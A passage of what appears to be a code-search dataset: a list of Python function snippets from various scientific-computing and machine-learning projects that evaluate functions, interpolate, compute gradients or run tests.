> self.z_n - 1] = self.z_n - 1\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.f_values[x_pos - 1, y_pos - 1, z_pos - 1]\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.f_values[x_pos - 1, y_pos - 1, z_pos]\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.f_values[x_pos - 1, y_pos, z_pos - 1]\n + (1 - alpha) * beta * gamma * self.f_values[x_pos - 1, y_pos, z_pos]\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.f_values[x_pos, y_pos - 1, z_pos - 1]\n + alpha * (1 - beta) * gamma * self.f_values[x_pos, y_pos - 1, z_pos]\n + alpha * beta * (1 - gamma) * self.f_values[x_pos, y_pos, z_pos - 1]\n + alpha * beta * gamma * self.f_values[x_pos, y_pos, z_pos]\n )\n return f", "def _evaluate(self, X, Y):\n # evaluate all networks\n #\n # evaluations = torch.zeros(self.population_size, device=self.device)\n evaluations = torch.zeros(self.population_size, device=self.device)\n\n for i in range(self.population_size):\n selected_pheno = self.population[i].cpu()\n # if IDCT is to be used first transform the vector, then use it to assemble the network\n if self.IDCT_from is not None:\n selected_pheno = torch.tensor(\n fftpack.idct(np.array(selected_pheno), n=self.model.total_parameters(), norm=\"ortho\"))\n fill_weights(self.model, selected_pheno.to(self.device))\n # evaluate\n predicted = self.model.forward(X)\n evaluations[i] = self.loss_function(predicted, Y)\n return evaluations", "def _evalfunc_nonlin(self, ai_patch, apr_points, elts=None):\n # loop over fields involved in the function\n# li_nfields = len(self.func_arguments)\n# print \"li_nfields=\", li_nfields\n\n list_values_F = []\n for F in self.func_arguments:\n list_val = F.eval(ai_patch, elts)\n# print \"argfunc id : \", F.id\n# print \"argfunc coefs : \", F.get()\n# print \"eval on grids \", list_val\n\n list_values_F.append(list_val)\n\n # TODO to change when passed to ndof > 1\n lpr_val = self.func(list_values_F, apr_points)\n# print \"current Field : \", self.id\n# print \"lpr_val=\", lpr_val\n# print \"lpr_val.shape = \", lpr_val.shape\n return lpr_val", "def eval_numerical_gradient(f, x, verbose = True, h = 0.00001):\n fx = f(x) # evaluate function value at original point\n grad = np.zeros_like(x) # iterate over all indexese in x\n it = np.nditer(x, flags = ['multi_index'], op_flags = ['readwrite'])\n while not it.finished:\n # evaluate function at x+h\n ix = it.multi_index\n oldval = x[ix]\n x[ix] = oldval + h # increment by h\n fxph = f(x) # evaluate f(x+h)\n x[ix] = oldval - h\n fxmh = f(x) # evaluate f(x-h)\n x[ix] = oldval # restore\n \n #compute the partial derivative with centered fromula.\n grad[ix] = (fxph - fxmh) / (2 * h)\n if verbose:\n print(ix, grad[ix])\n it.iternext()\n return grad", "def EvaluateFunction(self, p_float=..., p_float=..., p_float=...):\n ...", "def test_independent_expval(self, execute_kwargs):\n dev = qml.device(\"default.qubit\", wires=2)\n params = jax.numpy.array([0.1, 0.2, 0.3])\n\n def cost(a, cache):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.RY(a[2], wires=0)\n qml.expval(qml.PauliZ(1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n res = qml.interfaces.execute([tape], dev, cache=cache, **execute_kwargs)\n return res[0]\n\n res = jax.jit(jax.grad(cost), static_argnums=1)(params, cache=None)\n assert res.shape == (3,)", "def grid_evaluation(self, x, y, size=256):\n\t\t# Create matrix x and y coordinates\n\t\tL = self.L\n\t\t[xx, yy] = meshgrid(linspace(-L, L, size), linspace(-L, L, size))\n\t\tpts = np.array([xx, yy])\n\t\tux = batch_eval(x, pts)\n\t\tuy = batch_eval(y, pts)\n\t\treturn xx, yy, ux, uy", "def test_independent_expval(self, execute_kwargs):\n dev = qml.device(\"default.qubit\", wires=2)\n params = jax.numpy.array([0.1, 0.2, 0.3])\n\n def cost(a, cache):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.RY(a[2], wires=0)\n qml.expval(qml.PauliZ(1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n res = execute([tape], dev, cache=cache, **execute_kwargs)\n return res[0]\n\n res = jax.jit(jax.grad(cost), static_argnums=1)(params, cache=None)\n assert res.shape == (3,)", "def function(self, variables, exprs, mode=None, explicit_pars=False,\n givens=None,\n on_unused_input='raise', numpy_result=False):\n if mode is None:\n if getattr(self, 'mode', None) is None:\n mode = theano.config.mode\n else:\n mode = self.mode\n\n # Get variables and expressions into a canonical form first that is\n # assumed below.\n variables = [self._lookup(self.exprs, i) for i in variables]\n\n if not isinstance(exprs, list):\n # We memorize whether exprs originall was a list. If it was, we\n # need to undo this later for the returned function.\n exprs_not_list = True\n exprs = [exprs]\n else:\n exprs_not_list = False\n exprs = [self._lookup(self.exprs, i) for i in exprs]\n\n # We need to clone instead of using the givens parameter of\n # theano.function, because otherwise we might get a theano error\n # with conflicting replacements. (See theano/compile/pfunc.py:162,\n # rebuild_collect_shared.)\n if givens is not None:\n exprs = [theano.clone(e, givens) for e in exprs]\n else:\n givens = {}\n\n # Build update dictionary.\n updates = collections.defaultdict(lambda: {})\n if isinstance(exprs, (list, tuple)):\n for expr in exprs:\n if isinstance(expr, list):\n expr = tuple(expr)\n\n # TODO: last takes all, maybe should throw an error.\n updates.update(self.updates[expr])\n else:\n updates.update(self.updates[exprs])\n\n if GPU:\n # This is a workaround for theano issue #1467. After cloning a\n # graph with random state in it, the cloning will not make the\n # random state reference the new substitutions but instead have\n # references to the old variables. The workaround is to silently\n # add these variables to the givens parameter, and substitute them\n # with their new references.\n outputs = not numpy_result\n old_variables, old_exprs = variables, exprs\n variables, exprs = self.var_exp_for_gpu(\n variables, exprs, outputs=outputs)\n more_givens = [(old, new) for old, new\n in zip(old_variables, variables)\n if any(tell_variable_in_expr(old, e) for e in exprs)]\n givens.update(dict(more_givens))\n\n variables = [self.parameters.flat] + variables\n\n f = theano.function(\n variables,\n exprs[0] if exprs_not_list else exprs,\n givens=givens, mode=mode,\n on_unused_input=on_unused_input, updates=updates)\n\n if GPU:\n f = gnumpy_func_wrap(f)\n\n if not explicit_pars:\n def f_implicit_pars(*args, **kwargs):\n return f(self.parameters.data, *args, **kwargs)\n f_implicit_pars.theano_func = f\n f_implicit_pars.breze_func = True\n return f_implicit_pars\n\n else:\n f.breze_func = True\n return f", "def evaluate(self, batch: RecordBatch) -> Any:\n processed_args = self._process_arguments(self._arguments, batch)\n if self._function:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=RuntimeWarning)\n if self._is_binary_func:\n result = self._apply_binary_args_function(\n *processed_args\n )\n else:\n result = self._function(*processed_args)\n else:\n result = self._expr_kernel(processed_args, batch)\n\n return self._post_process_result(result)", "def f(self, eval_grid, index_data):\n\n # Make sure we have 2-d arrays throughout.\n if len(eval_grid.shape) == 1:\n eval_grid = np.reshape(eval_grid, (len(eval_grid), 1))\n elif len(eval_grid.shape) > 2:\n raise ValueError(eval_grid.shape)\n if len(index_data.shape) == 1:\n index_data = np.reshape(index_data, (len(index_data), 1))\n elif len(index_data.shape) > 2:\n raise ValueError(index_data.shape)\n\n return self.f_s(\n index=eval_grid,\n index_s=index_data,\n leave_one_out_locs=np.array([], dtype=np.int64),\n other_locs=np.arange(len(eval_grid))\n )", "def eval_numerical_gradient(f, x, verbose=True, h=0.00001):\n\n fx = f(x) # evaluate function value at original point\n grad = np.zeros_like(x)\n # iterate over all indexes in x\n it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n\n # evaluate function at x+h\n ix = it.multi_index\n oldval = x[ix]\n x[ix] = oldval + h # increment by h\n fxph = f(x) # evalute f(x + h)\n x[ix] = oldval - h\n fxmh = f(x) # evaluate f(x - h)\n x[ix] = oldval # restore\n\n # compute the partial derivative with centered formula\n grad[ix] = (fxph - fxmh) / (2 * h) # the slope\n if verbose:\n print(ix, grad[ix])\n it.iternext() # step to next dimension\n\n return grad", "def eval(self, df):\n ## Check invariant; model inputs must be subset of df columns\n if not set(self.var).issubset(set(df.columns)):\n raise ValueError(\n \"Model function `{}` var not a subset of given columns\".format(\n self.name\n )\n )\n\n ## Set up output\n n_rows = df.shape[0]\n results = zeros((n_rows, len(self.out)))\n\n for ind in range(n_rows):\n results[ind] = self.func(*df.loc[ind, self.var])\n\n ## Package output as DataFrame\n return DataFrame(data=results, columns=self.out)", "def _evaluate(self, x, y, z):\n if _isscalar(x):\n f = self.compare([f(x, y, z) for f in self.functions])\n else:\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n f = self.compare(temp, axis=1)\n return f", "def __init__(self, f, N_elements, C, D, analytical, grid_points):\n\n\n\n self.Ne = N_elements\n self.gp = grid_points\n self.C = C\n self.D = D\n self.f = lambda x: f(x)\n self.tol = 10e-4\n self.x = sym.Symbol(\"x\")\n\n self.h = 1/(2*self.Ne)\n self.global_matrix = np.zeros([2*self.Ne, 2*self.Ne])\n self.global_vector = np.zeros([2*self.Ne])\n self.psi = sym.zeros(3*self.Ne,1)\n\n self.analytical = lambda x,C,D: analytical(x,C,D)\n\n self.x_values = np.linspace(0,1,self.gp)", "def compute(self, *args, **kwargs):\n for node in self.evaluation_sequence:\n node.evaluate()", "def __call__ ( self , args , cov2 = None ) :\n \n n = self.N \n assert len ( args ) == n , 'Invalid argument size'\n\n ## get value of the function \n val = float ( self.func ( *args ) ) \n \n ## no covariance matrix is specified ?\n if not cov2 : return val\n \n c2 = 0\n g = n * [ 0 ] ## gradient \n \n for i in range ( n ) :\n\n di = self.partial[i] ( *args )\n if iszero ( di ) : continue\n \n g [i] = di \n\n cii = self.__cov2 ( cov2 , i , i )\n c2 += di * di * cii\n \n for j in range ( i ) : \n\n dj = g [ j ]\n if iszero ( dj ) : continue\n \n cij = self.__cov2 ( cov2 , i , j ) \n c2 += 2 * di * dj * cij \n\n return VE ( val , c2 )", "def evaluate(self, batch_x, batch_y):\n raise NotImplementedError()", "def _evaluate(self, x, y, z):\n raise NotImplementedError()", "def eval_numerical_gradient(f,x):\n\n\tgrad = np.zeros(x.shape)\n\th = 0.0001\n\n\t# iterate over all indexes in x\n\tit = np.nditer(x, flag = ['multi_index'], op_flags = ['readwrite'])\n\n\twhile not it.finished:\n\t\tix = it.multi_index\n\t\told_value = x[ix]\n\n\t\tx[ix] = old_value + h\n\t\tfxh_left = f(x)\n\n\t\tx[ix] = old_value - h\n\t\tfxh_right = f(x)\n\n\t\tx[ix] = old_value\n\n\t\t# compute the partial derivative\n\t\tgrad[ix] = (fxh_left - fxh_right) / (2 * h)\n\t\tit.iterate()\n\n\treturn grad", "def evaluate(self, g):\n pass", "def evaluate_function(self, indices, y_measured=None):\n indices = [indices] if not self.batch_update else indices\n if self.simulate_measurement:\n for idx in indices:\n self.y_sparse[tuple(idx)] = self.y_true[tuple(idx)]\n elif y_measured is not None:\n for idx in indices:\n self.y_sparse[tuple(idx)] = y_measured[tuple(idx)]\n else:\n for idx in indices:\n if self.extent is not None:\n _idx = []\n for i, e in zip(idx, self.extent):\n _idx.append(i + e[0])\n _idx = tuple(_idx)\n else:\n _idx = tuple(idx)\n self.y_sparse[tuple(idx)] = self.target_function(_idx)\n self.X_sparse = gprutils.get_sparse_grid(self.y_sparse, self.extent)\n self.target_func_vals.append(self.y_sparse.copy())\n return", "def compute(self, event=None, zs=None, thetas=None, nhats=None):\n\n\n if self.strassen:\n return self._strassen_compute(event, zs, thetas)\n else:\n return self._efp_compute(event, zs, thetas, nhats)", "def _evaluate(self, x, y):\n if _isscalar(x):\n x_pos = max(min(self.xSearchFunc(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(self.ySearchFunc(self.y_list, y), self.y_n - 1), 1)\n else:\n x_pos = self.xSearchFunc(self.x_list, x)\n x_pos[x_pos < 1] = 1\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = self.ySearchFunc(self.y_list, y)\n y_pos[y_pos < 1] = 1\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n f = (\n (1 - alpha) * (1 - beta) * self.f_values[x_pos - 1, y_pos - 1]\n + (1 - alpha) * beta * self.f_values[x_pos - 1, y_pos]\n + alpha * (1 - beta) * self.f_values[x_pos, y_pos - 1]\n + alpha * beta * self.f_values[x_pos, y_pos]\n )\n return f", "def compute_integrals(self):\n\n integrals = self.dat.data.reshape(-1, self.nvdofs).T.dot(self.cell_volumes)\n integrals_lift = Function(self._function_space)\n integrals_lift.dat.data[:] = np.tile(integrals,(self.nhdofs,))\n\n return integrals_lift", "def evaluate_shape_derivatives(self, locations, elements=None):\n # points = np.zeros((5, 4, self.n_cells, 3))\n # points[:, :, even_mask, :] = nodes[:, even_mask, :][self.tetra_mask_even, :, :]\n # points[:, :, ~even_mask, :] = nodes[:, ~even_mask, :][self.tetra_mask, :, :]\n\n # # changing order to points, tetra, nodes, coord\n # points = points.swapaxes(0, 2)\n # points = points.swapaxes(1, 2)\n if elements is None:\n elements = np.arange(0, self.n_elements, dtype=int)\n ps = self.nodes[\n self.elements, :\n ] # points.reshape(points.shape[0] * points.shape[1], points.shape[2], points.shape[3])\n # vertices = self.nodes[self.elements[col,:]]\n m = np.array(\n [\n [\n (ps[:, 1, 0] - ps[:, 0, 0]),\n (ps[:, 1, 1] - ps[:, 0, 1]),\n (ps[:, 1, 2] - ps[:, 0, 2]),\n ],\n [\n (ps[:, 2, 0] - ps[:, 0, 0]),\n (ps[:, 2, 1] - ps[:, 0, 1]),\n (ps[:, 2, 2] - ps[:, 0, 2]),\n ],\n [\n (ps[:, 3, 0] - ps[:, 0, 0]),\n (ps[:, 3, 1] - ps[:, 0, 1]),\n (ps[:, 3, 2] - ps[:, 0, 2]),\n ],\n ]\n )\n I = np.array(\n [[-1.0, 1.0, 0.0, 0.0], [-1.0, 0.0, 1.0, 0.0], [-1.0, 0.0, 0.0, 1.0]]\n )\n m = np.swapaxes(m, 0, 2)\n element_gradients = np.linalg.inv(m)\n\n element_gradients = element_gradients.swapaxes(1, 2)\n element_gradients = element_gradients @ I\n\n return element_gradients[elements, :, :], elements", "def evaluate(self, g):\n raise NotImplementedError", "def test_applyFunction(self):\n\n ptwise_linear = XYs1d(axes=XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: ('crossSection', 'b'),\n XYs1dModule.xAxisIndex: ('energy_in', 'eV')}), data=[[1e-5, 1.0], [20.0e6, 21.0]])\n\n self.assertAlmostEqual(ptwise_linear.evaluate(15.0e6), 16.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(15.0e6), math.exp(-16.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.evaluate(1.0e6), 2.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(1.0e6), math.exp(-2.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-ptwise_linear.evaluate(x)), None).evaluate(1.0e6), math.exp(-2.0), 3) # This should absolutely fail and is the wrong way to do it", "def _evaluate(self,d_repr, chain_state):\n results = iter(self.function(**chain_state))\n if self.derivative_vars:\n return results.next(), d_repr(1, self.derivative_order, results)\n else :\n return results.next()", "def differential_evolution(f, D_dimension, N_samples, min_bound, max_bound):\n #Multidimensional of D dimensions\n #in our case D= 3 for CIR Model\n \n Min_Bound = min_bound\n Max_Bound = max_bound\n \n #restrict the space to only positive doubles in (0,1)\n D = D_dimension\n N = N_samples*D\n #N=5\n \n CR = 0.9 #[0,1]\n F = 0.8 #(0,2)\n \n #generate N points\n generation_ = 0\n matrix = np.random.random((D,N))*Max_Bound\n \n full_list = np.arange(N)\n collecting_fitness_scores = np.zeros(N)\n while generation_ < 200:\n \n #print \"\\nAt Generation {}\".format(generation_)\n \n for i in range(matrix.shape[1]): #going across columns...N \n \n #print \"at column {}\".format(i)\n \n #randomly pick 3 indices from the subset list\n new_list = np.delete(full_list,i)\n x1,x2,x3 = np.random.choice(new_list,3)\n \n #Mutation Stage\n V = matrix[:,x1] + F * (matrix[:,x2] - matrix[:,x3]) #check bounds here\n V = checkBounds(V,Min_Bound,Max_Bound)\n \n \n U = np.zeros(len(V)) #make trial vector\n random_choice = np.random.choice(D)\n #Recombination Stage (Crossover) Forming Trial Vector\n for j in range(len(V)):\n s = np.random.uniform() #draw random uniform number in [0,1]\n if (s <= CR) or (j == random_choice): #if s <= CR then crossover\n U[j] = V[j]\n else:\n U[j] = matrix[j,i]\n #U[0] = V[0] #definite crossover\n \n# #Comparing Fitness Scores\n# fitness_trial_vec = f(U)\n# fitness_original = f(matrix[:,i]) \n# if fitness_trial_vec <= fitness_original:\n# matrix[:,i] = U\n# collecting_fitness_scores[i] = fitness_trial_vec\n# else:\n# collecting_fitness_scores[i] = fitness_original\n \n x1_satisfied = checkConditions(U)\n x2_satisfied = checkConditions(matrix[:,i])\n \n fitness_trial_vec = f(U)\n fitness_original = f(matrix[:,i])\n \n \n if x1_satisfied and x2_satisfied:\n if fitness_trial_vec < fitness_original:\n matrix[:,i] = U\n collecting_fitness_scores[i] = fitness_trial_vec\n else:\n collecting_fitness_scores[i] = fitness_original\n elif (x1_satisfied == True) and (x2_satisfied == False):\n matrix[:,i] = U\n collecting_fitness_scores[i] = fitness_trial_vec\n elif (x1_satisfied == False) and (x2_satisfied == True):\n collecting_fitness_scores[i] = fitness_original\n else:\n if fitness_trial_vec < fitness_original:\n matrix[:,i] = U\n collecting_fitness_scores[i] = fitness_trial_vec\n else:\n collecting_fitness_scores[i] = fitness_original\n \n \n \n #print collecting_fitness_scores\n \n \n generation_ += 1\n \n print \"smallest fitness score: {}\".format(np.min(collecting_fitness_scores))\n smallest = matrix[:,np.argmin(collecting_fitness_scores)]\n print \"smallest: {}\".format(smallest)\n \n return smallest", "def _efp_compute(self, event, zs, thetas, nhats):\n\n return self.efpset.compute(event, zs, thetas, nhats)", "def eval_grads(self, data):\n drho = np.zeros_like(self.rhos)\n dW = np.zeros_like(self.W)\n da = np.zeros_like(self.a)\n dc = np.zeros_like(self.c)\n dba = np.zeros_like(self.bs['alpha'])\n dVa = np.zeros_like(self.Vs['alpha'])\n dbm = np.zeros_like(self.bs['mu'])\n dVm = np.zeros_like(self.Vs['mu'])\n dbs = np.zeros_like(self.bs['sigma'])\n dVs = np.zeros_like(self.Vs['sigma'])\n\n const = 0.5 * np.log(2. * np.pi)\n for i in range(self.Ndim - 1, -1, -1):\n a = self.rhos[i] * self.a[i]\n h = 0.5 * (a + np.abs(a)) # ReLU\n dlt = (data[:, i][:, None] - self.mus[i][None, :])\n dlt /= self.sigmas[i][None, :]\n dlt = np.mean(dlt, axis=0)\n phi = 0.5 * dlt ** 2. - np.log(self.sigmas[i]) - const\n pi = self.alphas[i] * phi\n pi /= np.mean(pi)\n dza = pi - self.alphas[i]\n dba[i] = dza\n dVa[i] = dza[None, :] * h[:, None]\n dzm = pi * dlt\n dzm *= self.slow_factor # apparently this is a `tight' component\n dbm[i] = dzm\n dVm[i] = dzm[None, :] * h[:, None]\n dzs = pi * (dlt ** 2. - 1)\n dbs[i] = dzs\n dVs[i] = dzs[None, :] * h[:, None]\n\n # dh has shape Nhidden x Ncomponents (?)\n dh = dza * dVa[i] + dzm * dVm[i] + dzs * dVs[i]\n dpsi = 1. * (dh > 0)\n\n # collapse to a scalar or vector of Nhidden?\n drho[i] = np.mean(dpsi)\n\n if i == 0:\n dc = da[i]\n else:\n da[i - 1] = da[i] + np.mean(dpsi * self.rhos[i], axis=1)\n dW[:, i] = np.mean(da[i - 1][:, None] * data[:, i][None, :],\n axis=1)\n self.a[i - 1] = self.a[i] - np.mean(data[:, i][None, :] *\n self.W[:, i][:, None],\n axis=1)\n\n return -drho, -dc, -dW, -dba, -dVa, -dbm, -dVm, -dbs, -dVs", "def evaluate_functional(x, functional, solution, functionals={}, params={}):\n\n functional = eval_expr(functional, functionals, params)\n\n undefined = functional.free_symbols - set(x)\n if undefined:\n raise ValueError(\n f\"Functional contains symbols with undefined values: {undefined}\"\n )\n\n code = _generate_code(x, functional)\n # print(code)\n ldict = {}\n exec(code, globals(), ldict)\n evaluate = ldict[\"evaluate\"]\n del code, ldict\n\n K = len(solution)\n values = numpy.empty(K, dtype=float)\n evaluate(values, solution)\n return values", "def eval(self, df):\n df_res = self.func(df)\n return df_res[self.out]", "def run(self):\n\t\tcurX = self.x0\n\t\tcurY = self.func.evalAt(curX)\n\t\tcurT = self.T0\n\t\tfor i in range(1, self.iters + 1):\n\t\t\tif curT == 0:\n\t\t\t\tbreak\n\t\t\tnX = self.newStateFunc(curX)\n\t\t\tnY = self.func.evalAt(nX)\n\t\t\tif nY <= curY or self.acceptanceFunc(nY - curY, curT) > random.random(): # accept if lower energy or probability check passes\n\t\t\t\tcurX = nX\n\t\t\t\tcurY = nY \n\t\t\tcurT = self.coolingFunc(self.T0, i)\t\n\t\treturn (curX, curY)", "def _evaluate(self, w, x, y, z):\n raise NotImplementedError()", "def test_gradable_funcs(self):\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = None", "def _evaluate_fitness(self, population: Population):\n for n, individual in enumerate(population.individuals):\n\n # Dataset extraction using individual features\n X_data = self._create_dataset(individual, self._X)\n\n # Get scores for each fitness strategy (each objective)\n scores = [fitness_func.eval_fitness(X=X_data, y=self._y, num_feats=len(population.features))\n for fitness_func in self.fitness]\n\n # If the number of features is an objective\n if self.optimize_features:\n scores.append(self.features_function(individual=individual,\n total_feats=len(self._population.features)))\n\n # Create a solution\n individual.fitness = Solution(scores)\n\n return population", "def evaluate(self,var,g=None):\n if (g==None):g=self.g\n assert(len(var)==self.n)\n res=np.zeros(self.n+1)\n for i in range(self.n):\n res[i]=var[i]**2+2.*var[i]-self.N*(self.n-self.N)*g**2*self.gamma-g*np.sum([self.XXZ.Z(i,j)*(var[i]-var[j]) for j in range(self.n) if j!=i])\n res[self.n]=np.sum(var)+2.*self.N\n return res", "def evaluate():\n model.eval()\n with torch.no_grad():\n loss, n = 0, 0\n for xb, yb in valid_dl:\n n += len(xb)\n loss += loss_func(model(xb), yb) * len(xb)\n\n return loss/n", "def evaluate(self, *args, **kwargs):\n params = self.process_args(args, kwargs)\n a = params['a']\n b = params['b']\n return a * self.x + b", "def evaluate(bounds , func):\n if len(bounds) != 2:\n raise ValueError(\"Bounds should contain 2 elements, found %d.\" % len(bounds))\n\n a = bounds[0]\n b = bounds[1]\n ya = func(a)\n yb = func((a+b)/2.)\n yc = func(b)\n I = (b-a) * (ya + 4. * yb + yc) / 6.\n return I", "def compute_gradients(self, f, args, grad_ys=None):\n if tf.executing_eagerly():\n grad_fn = tf.contrib.eager.gradients_function(f)\n if grad_ys is not None:\n grads = grad_fn(*args, dy=grad_ys)\n else:\n grads = grad_fn(*args)\n else:\n res = f(*args)\n grads = tf.gradients(res, args, grad_ys=grad_ys)\n return self.evaluate(grads)", "def compute_gradient(self, function, arguments):", "def iterate_run(self, rho: float, **kwargs):\r\n # TODO extend to non mono-dimensional variables\r\n\r\n # build local problem\r\n x_i = Variable(self.x_shape[0])\r\n\r\n penalties = [(x_i - self.z_neigh[j])@(x_i - self.z_neigh[j]) for j in self.agent.in_neighbors]\r\n penalties.append((x_i - self.z)@(x_i - self.z))\r\n sumlambda = sum(self.lambd.values())\r\n\r\n obj_function = self.agent.problem.objective_function + sumlambda @ x_i + (rho/2) * sum(penalties)\r\n pb = Problem(obj_function, self.agent.problem.constraints)\r\n\r\n # solve problem and save data\r\n x = pb.solve()\r\n\r\n # exchange primal variables and dual variables with neighbors\r\n x_neigh = self.agent.neighbors_exchange(x)\r\n lambda_neigh = self.agent.neighbors_exchange(self.lambd, dict_neigh=True)\r\n\r\n # compute auxiliary variable\r\n z = (sum(x_neigh.values()) + x) / (self.degree+1) + \\\r\n (sum(lambda_neigh.values()) + self.lambd[self.agent.id]) / (rho*(self.degree+1))\r\n\r\n # exchange auxiliary variables with neighbors\r\n z_neigh = self.agent.neighbors_exchange(z)\r\n\r\n # update local data\r\n self._update_local_solution(x, z, z_neigh, rho, **kwargs)", "def calculate_numerical_solution(self):\n\n self.u = np.vectorize(self.u)\n self.numerical = np.zeros(self.gp) #Store value of u(x) in each gridpoint\n\n\n #Calculate special case of element 0\n L = 0\n R = 2*self.h\n end = np.where((np.abs(self.x_values - R)<=self.tol))[0][0]\n end += 1\n x = self.x_values[L:end]\n self.numerical[L:end] = self.u(x,0,0)\n temp = 1 #Starts as 1 since the 0th element is calculated outside the loop\n\n #Calculate value of u(x) in each element.\n for i in range(2,2*self.Ne,2):\n\n L = i* self.h\n R = L + 2*self.h\n\n #Find idices in x array to define element start/end\n start = np.where((np.abs(self.x_values - L)<=self.tol))[0][0]\n end = np.where((np.abs(self.x_values - R)<=self.tol))[0][0]\n\n #We want to find L < X <= R, except from first element where we want to include L=0.\n start += 1\n end += 1\n x = self.x_values[start:end]\n self.numerical[start:end] = self.u(x,i,temp)\n\n temp+=1", "def evaluate(\n config,\n _,\n pstate,\n eval_ds,\n rng,\n unused_num_eval_steps = -1,\n):\n logging.info(\"Starting evaluation.\")\n eval_metrics = None\n state = flax_utils.unreplicate(pstate)\n\n render_loop = instant_ngp_utils.make_render_loop(state.params, config)\n with utils.StepTraceContextHelper(\"eval\", 0) as trace_context:\n for step, batch in enumerate(eval_ds): # pytype: disable=wrong-arg-types\n data = jax.tree_map(jnp.asarray, batch)\n render_poses = data[\"c2w\"]\n hwf = data[\"hwf\"]\n rng = jax.random.fold_in(rng, step)\n\n frames = []\n for pose in render_poses:\n frames.append(\n render_loop(instant_ngp_utils.camera_ray_batch(pose, hwf), rng)[0]\n )\n psnrs_test = [\n -10 * jnp.log10(jnp.mean(jnp.square(rgb - gt)))\n for (rgb, gt) in zip(frames, data[\"images\"])\n ]\n psnr_test = np.array(psnrs_test).mean()\n eval_metrics = EvalMetrics.single_from_model_output(psnr=psnr_test)\n trace_context.next_step()\n eval_info = {\n \"out\": jnp.concatenate([x[None, Ellipsis] for x in frames], axis=0),\n \"gtr\": data[\"images\"],\n }\n return eval_metrics, eval_info", "def test_grad_on_execution(self, mocker):\n dev = qml.device(\"default.qubit\", wires=1)\n spy = mocker.spy(dev, \"execute_and_gradients\")\n\n def cost(a):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return execute(\n [tape],\n dev,\n gradient_fn=\"device\",\n gradient_kwargs={\n \"method\": \"adjoint_jacobian\",\n \"use_device_state\": True,\n },\n )[0]\n\n a = jax.numpy.array([0.1, 0.2])\n jax.jit(cost)(a)\n\n # adjoint method only performs a single device execution, but gets both result and gradient\n assert dev.num_executions == 1\n spy.assert_called()", "def test_make_efuncs(exprs, nfuncs, ntimeiters, nests):\n exprs = list(as_tuple(exprs))\n\n grid = Grid(shape=(10, 10))\n t = grid.stepping_dim # noqa\n x, y = grid.dimensions # noqa\n\n u = Function(name='u', grid=grid) # noqa\n v = TimeFunction(name='v', grid=grid) # noqa\n\n # List comprehension would need explicit locals/globals mappings to eval\n for i, e in enumerate(list(exprs)):\n exprs[i] = eval(e)\n\n op = Operator(exprs)\n\n # We create one ElementalFunction for each Iteration nest over space dimensions\n efuncs = []\n for n, tree in enumerate(retrieve_iteration_tree(op)):\n root = filter_iterations(tree, key=lambda i: i.dim.is_Space)[0]\n efuncs.append(make_efunc('f%d' % n, root))\n\n assert len(efuncs) == len(nfuncs) == len(ntimeiters) == len(nests)\n\n for efunc, nf, nt, nest in zip(efuncs, nfuncs, ntimeiters, nests):\n # Check the `efunc` parameters\n assert all(i in efunc.parameters for i in (x.symbolic_min, x.symbolic_max))\n assert all(i in efunc.parameters for i in (y.symbolic_min, y.symbolic_max))\n functions = FindSymbols().visit(efunc)\n assert len(functions) == nf\n assert all(i in efunc.parameters for i in functions)\n timeiters = [i for i in FindSymbols('basics').visit(efunc)\n if isinstance(i, Dimension) and i.is_Time]\n assert len(timeiters) == nt\n assert all(i in efunc.parameters 